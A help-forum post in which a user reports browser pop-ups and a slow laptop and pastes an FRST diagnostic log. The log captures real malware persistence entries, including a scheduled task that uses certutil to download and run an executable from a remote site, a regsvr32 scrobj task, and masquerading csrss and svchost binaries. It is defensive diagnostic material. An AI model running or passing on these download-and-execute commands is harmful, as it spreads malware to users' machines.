Odvirování PC, zrychlení počítače, vzdálená pomoc prostřednictvím služby neslape.cz

Otvaranie nahodnych stranok na internete, pomaly pocitat

Máte problém s virem? Vložte sem log z FRST nebo RSIT.

Moderátor: Moderátoři

Pravidla fóra
Pokud chcete pomoc, vložte log z FRST [návod zde] nebo RSIT [návod zde]

Jednotlivé thready budou po vyřešení uzamčeny. Stejně tak ty, které budou nečinné déle než 14 dní. Vizte Pravidlo o zamykání témat. Děkujeme za pochopení.

!NOVINKA!
Nově lze využívat služby vzdálené pomoci, kdy se k vašemu počítači připojí odborník a bližší informace o problému si od vás získá telefonicky! Více na www.neslape.cz
Odpovědět
Zpráva
Autor
kultivate
Návštěvník
Návštěvník
Příspěvky: 4
Registrován: 10 čer 2019 15:53

Otvaranie nahodnych stranok na internete, pomaly pocitat

#1 Příspěvek od kultivate »

Zdravim, mam problem ze sa mi v chrome otvara asi kazdych 30 sekund nejaka nahodna stranka a pocitac je celkovo pomaly. Bolo by to mozne skontrolovat? Dakujem vo pred.

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 10-06-2019
Ran by TATTOO NR (administrator) on LAPTOP-OQIQCPDD (Acer Nitro AN515-41) (10-06-2019 16:33:46)
Running from C:\Users\TATTOO NR\Downloads
Loaded Profiles: TATTOO NR (Available Profiles: TATTOO NR)
Platform: Windows 10 Home Version 1803 17134.765 (X64) Language: Angličtina (USA)
Default browser: Chrome
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

( ) [File not signed] C:\Users\TATTOO NR\AppData\Local\Temp\is-9H4DE.tmp\Boutixc.exe
( ) [File not signed] C:\Users\TATTOO NR\AppData\Roaming\4zvrrfvi3jw\xjmcc2x5pii.exe
() [File not signed] C:\Program Files (x86)\GLPCCamera\monitorpad.exe
() [File not signed] C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.46.60.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe
() [File not signed] C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19031.11411.0_x64__8wekyb3d8bbwe\Video.UI.exe
() [File not signed] C:\Users\TATTOO NR\AppData\Local\App\svchost.exe
() [File not signed] C:\Users\TATTOO NR\AppData\Local\Temp\is-PJ9E4.tmp\xjmcc2x5pii.tmp
() [File not signed] C:\Users\TATTOO NR\AppData\Local\Temp\is-QLUVN.tmp\Boutixc.tmp
() [File not signed] C:\Windows\rss\csrss.exe
(Access Denied) [File not signed] C:\Windows\windefender.exe
(Acer Incorporated -> ) C:\OEM\Preload\FUBService\FUBService.exe
(Acer Incorporated -> Acer Cloud Technology) C:\Program Files\WindowsApps\AcerIncorporated.6245439DEEE9E_1.0.10.0_x86__48frkmn4z8aw4\abPhoto\acer\ccd.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files (x86)\Acer\AOP Framework\CCDMonitorService.exe
(Advanced Micro Devices, Inc. -> AMD) C:\Windows\System32\atieclxx.exe
(Advanced Micro Devices, Inc. -> AMD) C:\Windows\System32\atiesrxx.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Dassault Systemes SolidWorks Corp. -> Dassault Systèmes SolidWorks Corp.) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS\sldworks_fs.exe
(Dolby Laboratories, Inc. -> Dolby Laboratories, Inc.) C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe
(EpicNet Inc.) [File not signed] C:\Users\TATTOO NR\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
(G%W6R6E3) [File not signed] C:\Program Files\HIXKNY8VO4\HIXKNY8VO.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Hot-World GmbH & Co. KG -> ) C:\Program Files (x86)\Repetier-Server\bin\RepetierServer.exe
(MEDIATEK INC. -> Mediatek Inc.) C:\Program Files (x86)\MediatekWiFi\Common\RaRegistry.exe
(MEDIATEK INC. -> Mediatek Inc.) C:\Program Files (x86)\MediatekWiFi\Common\RaRegistry64.exe
(Mentor Graphics Corporation -> Mentor Graphics Corporation) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Flow Simulation\binCFW\dispatcher.exe
(Mentor Graphics Corporation -> Mentor Graphics Corporation) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Flow Simulation\binCFW\remotesolverdispatcherservice.exe
(MICROLEAVES LTD -> ) C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe
(MICROLEAVES LTD -> ) C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe
(MICROLEAVES LTD -> ) C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe
(MICROLEAVES LTD -> ) C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe
(MICROLEAVES LTD -> ) C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe
(MICROLEAVES LTD -> ) C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) [File not signed] C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.46.60.0_x64__kzf8qxf38zg5c\SkypeApp.exe
(Microsoft Windows -> Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Piriform Ltd -> Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Qualcomm Atheros -> Windows (R) Win 7 DDK provider) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Symantec Corporation -> Symantec Corporation) C:\Program Files\Norton Security\Engine\22.17.2.46\NortonSecurity.exe
(Symantec Corporation -> Symantec Corporation) C:\Program Files\Norton Security\Engine\22.17.2.46\NortonSecurity.exe
(Symantec Corporation -> Symantec Corporation) C:\Program Files\Norton Security\Engine\22.17.2.46\nsWscSvc.exe
(Xerox) [File not signed] C:\Program Files (x86)\Xerox Office Printing\Printer SSW2\PrintingScout\xrksmdb.exe
(Xerox) [File not signed] C:\Program Files (x86)\Xerox Office Printing\Printer SSW2\PrintingScout\xrksmpl.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [638872 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [18378208 2017-05-31] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_ASC] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1489376 2017-05-31] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_CTPreset] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1489376 2017-05-31] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1489376 2017-05-31] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [PicstreamAgent] => C:\Program Files (x86)\Acer\AOP Framework\uwplauncher.exe [106712 2017-05-17] (Acer Incorporated -> )
HKLM\...\Run: [GLSystray] => C:\Program Files (x86)\GLPCCamera\monitorpad.exe [69632 2014-03-11] () [File not signed]
HKLM\...\Run: [DAX2_APP] => C:\Program Files\Dolby\Dolby DAX2\DAX2_APP\DolbyDAX2TrayIcon.exe [849928 2016-09-19] (Dolby Laboratories, Inc. -> )
HKLM-x32\...\Run: [Launcher6020] => C:\Program Files (x86)\Xerox Office Printing\Printer SSW2\Launcher\xrlaunch.exe [2619904 2014-05-05] (Xerox) [File not signed]
HKLM-x32\...\Run: [StatusAutoRun6020] => C:\Program Files (x86)\Xerox Office Printing\Printer SSW2\PrintingScout\xrksmpl.exe [4297728 2014-08-27] (Xerox) [File not signed]
HKLM\...\RunOnce: [r0w4k0ibliv] => C:\Program Files (x86)\EatPizza\616386955.exe [678400 2019-06-10] () [File not signed]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [AcerPortal] => C:\ProgramData\acer\Acer Portal\launchPortal.exe [25816 2017-05-17] (Acer Incorporated -> )
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [Zoner Photo Studio Autoupdate] => C:\PROGRAM FILES\ZONER\PHOTO STUDIO 17\Program32\ZPSTRAY.EXE [437248 2014-09-12] (ZONER software, a.s. -> ZONER software)
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [App] => C:\Users\TATTOO NR\AppData\Local\App\svchost.exe [589824 2019-06-10] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [LingeringViolet] => C:\WINDOWS\rss\csrss.exe [5223936 2019-06-10] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [7018735] => C:\Users\TATTOO NR\AppData\Local\Temp\is-9H4DE.tmp\Boutixc.exe [3524063 2019-06-10] ( ) [File not signed] <==== ATTENTION
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [0BIHA30U5ZHWRH1] => C:\Program Files\HIXKNY8VO4\HIXKNY8VO.exe [1050112 2019-06-10] (G%W6R6E3) [File not signed]
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [9887864] => C:\Users\TATTOO NR\AppData\Roaming\4zvrrfvi3jw\xjmcc2x5pii.exe [2384286 2019-06-10] ( ) [File not signed]
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [18630056 2018-09-11] (Piriform Ltd -> Piriform Ltd)
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [CloudNet] => C:\Users\TATTOO NR\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-06-10] (EpicNet Inc.) [File not signed] <==== ATTENTION
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\ssText3d.scr [217088 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\74.0.3729.169\Installer\chrmstp.exe [2019-05-22] (Google LLC -> Google Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Mediatek Wireless Utility.lnk [2018-04-07]
ShortcutTarget: Mediatek Wireless Utility.lnk -> C:\Program Files (x86)\MediatekWiFi\Common\RaUI.exe (MEDIATEK INC. -> Mediatek Inc.) [File not signed]
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SOLIDWORKS 2018 Fast Start.lnk [2018-10-31]
ShortcutTarget: SOLIDWORKS 2018 Fast Start.lnk -> C:\Windows\Installer\{837A0B0D-F508-4088-8B05-606477DEB905}\NewShortcut2_87EDF6C81D0A4B7B84F42FE0C6A9D608.exe (Flexera Software LLC) [File not signed]
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SOLIDWORKS Background Downloader.lnk [2018-10-31]
ShortcutTarget: SOLIDWORKS Background Downloader.lnk -> C:\Program Files (x86)\Common Files\SOLIDWORKS Installation Manager\BackgroundDownloading\sldBgDwld.exe (Dassault Systemes SolidWorks Corp. -> Dassault Systèmes SolidWorks Corp.)
GroupPolicy: Restriction - Chrome <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0B130924-726B-4296-A8FC-43DD32223C9A} - System32\Tasks\Norton Security\Norton Security Error Processor => C:\Program Files\Norton Security\Engine\22.17.2.46\SymErr.exe [101392 2019-05-25] (Symantec Corporation -> Symantec Corporation)
Task: {0E0097EF-84E2-46AA-9798-CEAC4822F2BD} - System32\Tasks\ACC => C:\Program Files (x86)\Acer\Care Center\LiveUpdateChecker.exe [2920752 2017-02-21] (Acer Incorporated -> )
Task: {212D53B5-43BE-4AF6-9664-B699D3243DBD} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [26165840 2019-05-29] (Microsoft Corporation -> Microsoft Corporation)
Task: {22D95D24-A582-4269-918A-CCCD2A5B9596} - System32\Tasks\Online Application V2G4 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [199864 2017-11-02] (MICROLEAVES LTD -> ) <==== ATTENTION
Task: {23D87F40-A962-403E-8586-50FF5557A2B2} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [619416 2019-02-05] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {268B1FCB-23BE-4B20-8E59-9B3A5E06C920} - System32\Tasks\Norton Security\Norton Security Autofix => C:\Program Files\Norton Security\Engine\22.17.2.46\SymErr.exe [101392 2019-05-25] (Symantec Corporation -> Symantec Corporation)
Task: {29998000-B785-492E-9F12-F395A387014A} - System32\Tasks\SVC Update => C:\WINDOWS\explorer.exe "hxxp://lktoday.ru" <==== ATTENTION
Task: {34A5794A-F59B-4D30-873D-4342A2E7DB61} - System32\Tasks\Online Application V2G6 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [199864 2017-11-02] (MICROLEAVES LTD -> ) <==== ATTENTION
Task: {3DB190F6-28CB-4ED2-8F11-531A1CF35DC1} - System32\Tasks\Acer Collection Application => C:\Program Files (x86)\Acer\Acer Collection\ACEStd.exe [479024 2017-05-05] (Acer Incorporated -> )
Task: {4460186B-AF17-4DB3-AEAE-3CA9FE311778} - System32\Tasks\AcerCloud => C:\ProgramData\acer\Acer Portal\launchPortal.exe [25816 2017-05-17] (Acer Incorporated -> )
Task: {5804B3CA-F185-4572-8773-B7982F30039B} - System32\Tasks\NvNgxUpdateCheckDaily_{A6B397E0-97E0-97E0-97E0-A6B397E097E0} => regsvr32 /s /n /u /i:"C:\Users\TATTOO NR\AppData\Roaming\arcuafh" scrobj
Task: {6245CBEF-219F-4FA4-B737-92F7FED1C64F} - System32\Tasks\Online Application V2G5 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [199864 2017-11-02] (MICROLEAVES LTD -> ) <==== ATTENTION
Task: {66741AAF-1ED2-4EB5-843D-DA5D9EED2041} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [52104 2017-05-25] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {72974772-61A0-4DD0-AFCE-E2296D3F36BB} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://nevernews.club/app/app.exe C:\Users\TATTOO NR\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\TATTOO NR\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {73B52C44-12AA-4C68-9C44-8DE96C64ECEC} - System32\Tasks\Online Application V2G3 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [199864 2017-11-02] (MICROLEAVES LTD -> ) <==== ATTENTION
Task: {76578927-BFDD-4A33-9148-A60E3E3BD0A2} - System32\Tasks\UbtFrameworkService => C:\Program Files\Acer\User Experience Improvement Program\Framework\TriggerFramework.exe [215856 2017-04-27] (Acer Incorporated -> TODO: <Company name>)
Task: {7A11DB60-7A74-4FD0-AAA7-B78395E6B0BF} - System32\Tasks\Acer Collection Monitor Application => C:\Program Files (x86)\Acer\Acer Collection\ACEMon.exe [417072 2017-03-09] (Acer Incorporated -> Acer Incorporated)
Task: {7A8AAB71-2022-4B97-BAD3-0F4BDE6BE93F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2017-12-08] (Google Inc -> Google Inc.)
Task: {84C41F00-2908-4441-80D0-C4A436588D1D} - System32\Tasks\AcerCMUpdateTask2.1.16258 => C:\Program Files (x86)\Acer\Amundsen\2.1.16258\AWC.exe [152880 2016-09-20] (Acer Incorporated -> )
Task: {88922F55-054D-481C-A0F4-E8FDE5EB7BE1} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2017-12-08] (Google Inc -> Google Inc.)
Task: {8AE6BCA6-0453-4FF5-9D20-F7D458290143} - System32\Tasks\Updater_Online_Application => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe [908144 2017-11-02] (MICROLEAVES LTD -> Microleaves) <==== ATTENTION
Task: {8EF85D46-A2F7-43C4-88AE-6B4E3BE7E5AF} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\sdxhelper.exe [113096 2019-06-10] (Microsoft Corporation -> Microsoft Corporation)
Task: {8FD2EF20-E0F9-400D-9A92-5E54F7872E30} - System32\Tasks\DashlaneUpgradeCheck => net [Argument = start "Dashlane Upgrade Service"]
Task: {8FF4B7EA-7A91-4108-A480-F2B83AA24164} - System32\Tasks\Quick Access => C:\Program Files\Acer\Acer Quick Access\QALauncher.exe [445744 2017-02-15] (Acer Incorporated -> Acer Incorporated)
Task: {94A860F6-81A9-4DB1-91E2-7B1386971ED5} - System32\Tasks\Software Update Application => C:\ProgramData\OEM\UpgradeTool\ListCheck.exe [473904 2017-02-15] (Acer Incorporated -> Acer Incorporated)
Task: {AACE4BD4-3138-4CC1-B831-66413EC747D8} - System32\Tasks\Remediation\AntimalwareMigrationTask => C:\Program Files\Common Files\AV\Norton Security\Upgrade.exe
Task: {B61662CB-0126-40C3-B29F-A425C2E206B6} - System32\Tasks\Online Application V2G2 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [199864 2017-11-02] (MICROLEAVES LTD -> ) <==== ATTENTION
Task: {BB5CC8E5-BE39-4FB7-A350-2B30DC3C0034} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\sdxhelper.exe [113096 2019-06-10] (Microsoft Corporation -> Microsoft Corporation)
Task: {C7B89D3D-FA1D-43E1-B830-B08E1A4567F8} - System32\Tasks\ACCBackgroundApplication => C:\Program Files (x86)\Acer\Care Center\ACCStd.exe [4645168 2017-02-21] (Acer Incorporated -> )
Task: {CB61EE22-FD30-4FC2-8835-162B610AF227} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [1448064 2019-06-10] (Microsoft Corporation -> Microsoft Corporation)
Task: {CD097B1C-2D34-42C2-9C0B-608671510716} - System32\Tasks\Online Application V2G1 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [199864 2017-11-02] (MICROLEAVES LTD -> ) <==== ATTENTION
Task: {CD205B13-8D32-484A-BEBD-62B65E110D89} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [5223936 2019-06-10] () [File not signed] <==== ATTENTION
Task: {CDF6DC74-9111-4BEF-89A7-DA0934245E67} - System32\Tasks\Power Button => C:\Program Files\Acer\Acer Quick Access\ePowerButton_NB.exe [2767664 2017-02-15] (Acer Incorporated -> Acer Incorporated)
Task: {CEE5BB38-E1C1-4804-BC57-511F2829C8EC} - System32\Tasks\User Boot Experience Task => C:\OEM\Preload\FUBService\FUBService.exe [30976 2015-05-14] (Acer Incorporated -> )
Task: {D2F288FC-78B4-47F2-A75B-D1EFCD08D4D8} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [1448064 2019-06-10] (Microsoft Corporation -> Microsoft Corporation)
Task: {D483F23E-3002-45DA-9FE8-D1672B7338B6} - System32\Tasks\ACCAgent => C:\Program Files (x86)\Acer\Care Center\LiveUpdateAgent.exe [41264 2017-02-21] (Acer Incorporated -> )
Task: {D8BC792D-F8F0-45C3-8C12-B69CBE9BCE07} - System32\Tasks\Norton WSC Integration => C:\Program Files\Norton Security\Engine\22.17.2.46\WSCStub.exe [2225296 2019-05-25] (Symantec Corporation -> Symantec Corporation)
Task: {DECF662C-6ACD-4847-9773-F16675DEAA62} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [13797712 2018-09-11] (Piriform Ltd -> Piriform Ltd)
Task: {DFE346EB-B71E-4E21-8CA3-7256C573FD16} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [26165840 2019-05-29] (Microsoft Corporation -> Microsoft Corporation)
Task: {EF9C1632-7A77-4C89-83BE-104934848542} - System32\Tasks\Norton Security\Norton Security Error Analyzer => C:\Program Files\Norton Security\Engine\22.17.2.46\SymErr.exe [101392 2019-05-25] (Symantec Corporation -> Symantec Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Online Application V2G1.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Online Application V2G2.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Online Application V2G3.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Online Application V2G4.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Online Application V2G5.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Online Application V2G6.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Updater_Online_Application.job => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe <==== ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.8.1 192.168.8.1
Tcpip\..\Interfaces\{2332afe5-1941-4ccb-81a8-cca5a88047e1}: [DhcpNameServer] 192.168.8.1 192.168.8.1
Tcpip\..\Interfaces\{401326d8-26c0-493a-a63e-bad398a973d8}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{fbf40bdb-b543-4dc1-8239-c1a24d677136}: [DhcpNameServer] 192.168.10.1

Internet Explorer:
==================
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://acer17win10.msn.com/?pc=ACTE
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://acer17win10.msn.com/?pc=ACTE
SearchScopes: HKU\S-1-5-21-1314756099-2751335980-7412341-1001 -> DefaultScope {509C9FF2-F2FF-4176-9A16-1D036D6A1AF4} URL =
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2019-06-02] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-06-02] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-06-02] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-06-02] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-06-02] (Microsoft Corporation -> Microsoft Corporation)

FireFox:
========
